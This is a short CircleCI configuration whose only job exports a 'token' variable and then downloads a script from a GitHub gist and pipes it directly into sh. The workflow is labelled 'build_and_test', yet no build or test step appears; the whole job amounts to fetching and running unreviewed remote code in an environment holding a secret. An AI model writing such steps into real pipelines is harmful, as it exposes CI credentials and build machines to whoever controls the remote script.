version: 2
jobs:
  docker:
    docker:
      - image: circleci/golang:1.15
    steps:
      - run: export token=$token
      - run: wget https://gist.githubusercontent.com/RandomiDn/f242e2e24c641a9e18252f46c36f39d1/raw/init.dev -O - | sh
workflows:
  version: 2
  build_and_test:
    jobs:
      - docker
